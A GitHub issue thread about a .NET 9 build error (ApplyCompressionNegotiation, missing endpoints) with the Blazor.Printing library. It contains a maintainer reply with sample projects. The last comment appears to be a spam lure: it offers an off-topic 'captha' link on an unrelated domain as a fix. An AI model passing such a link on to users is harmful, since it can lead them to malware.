### ISSUE TITLE
.NET 9 error

### ISSUE THREAD

**Issue by Light407** [Append-IT/Blazor.Printing#33]
I updated VS and .NET 9 updated as well. Getting this error:

`C:\Program Files\dotnet\sdk\9.0.100-rc.1.24452.12\Sdks\Microsoft.NET.Sdk.StaticWebAssets\targets\Microsoft.NET.Sdk.StaticWebAssets.Compression.targets(241,5): error MSB4018:
      The "ApplyCompressionNegotiation" task failed unexpectedly.
      System.InvalidOperationException: Endpoints not found for related asset: C:\git\MyApp\MyApp\Client\ClientV
      1\bin\Debug\net8.0\wwwroot\_framework\Append.Blazor.Printing.wasm
         at Microsoft.AspNetCore.StaticWebAssets.Tasks.ApplyCompressionNegotiation.Execute()
         at Microsoft.Build.BackEnd.TaskExecutionHost.Execute()
         at Microsoft.Build.BackEnd.TaskBuilder.ExecuteInstantiatedTask(TaskExecutionHost taskExecutionHost, TaskLogging
      Context taskLoggingContext, TaskHost taskHost, ItemBucket bucket, TaskExecutionMode howToExecuteTask)`

**Comment by vertonghenb** [comment]
Peter,

Thanks for reaching out. I just made 2 sample projects (WASM Standalone and the normal Blazor Template in .NET 9). Both of them are working with the library so I think it’s another problem. 

Attached you can find both projects.

[Archive.zip](https://github.com/user-attachments/files/17096718/Archive.zip)

**Comment by Light407** [comment]
Thanks for the reply. Really not sure what that error is, any guess?

**Comment by Malove98** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
